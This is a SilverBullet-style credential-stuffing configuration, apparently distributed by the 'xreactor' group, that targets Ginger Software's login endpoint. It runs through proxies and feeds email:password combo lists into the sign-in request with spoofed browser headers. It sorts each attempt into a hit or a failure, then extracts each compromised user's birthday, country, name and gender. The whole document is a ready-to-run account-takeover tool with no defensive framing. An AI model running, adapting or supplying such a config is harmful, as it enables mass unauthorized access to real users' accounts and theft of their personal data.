[SETTINGS]
{
  "Name": "gingersoftware | xreactor.org",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-26T09:18:06.0151184+02:00",
  "AdditionalInfo": "for more configs :xreactor.org | @xractor_team",
  "RequiredPlugins": [],
  "Author": "@uzzzul | @xreactor_team",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "gingersoftware",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://auth.gingersoftware.com/signIn" 
  CONTENT "{\"apiKey\":\"BrowserStandalone\",\"affId\":\"\",\"source\":\"AuthModule\",\"platform\":\"Website\",\"userName\":\"<USER>\",\"password\":\"<PASS>\",\"origin\":\"website\",\"trigger\":\"\",\"clientVersion\":\"\",\"authenticationProvider\":\"GingerUser\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 237" 
  HEADER "content-type: application/json;charset=UTF-8" 
  HEADER "origin: https://cdn.gingersoftware.com" 
  HEADER "referer: https://cdn.gingersoftware.com/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Mobile Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"success\":false," 
  KEYCHAIN Success OR 
    KEY "{\"success\":true," 

#Birthday PARSE "<SOURCE>" JSON "Birthday" CreateEmpty=FALSE -> CAP "Birthday" 

#Country PARSE "<SOURCE>" JSON "Country" CreateEmpty=FALSE -> CAP "Country" 

#FirstName PARSE "<SOURCE>" JSON "FirstName" CreateEmpty=FALSE -> CAP "FirstName" 

#LastName PARSE "<SOURCE>" JSON "LastName" CreateEmpty=FALSE -> CAP "LastName" 

#Gender PARSE "<SOURCE>" JSON "Gender" CreateEmpty=FALSE -> CAP "Gender" 

#author FUNCTION Constant "@uzzzzul | @xreactor_team" -> CAP "configby" 

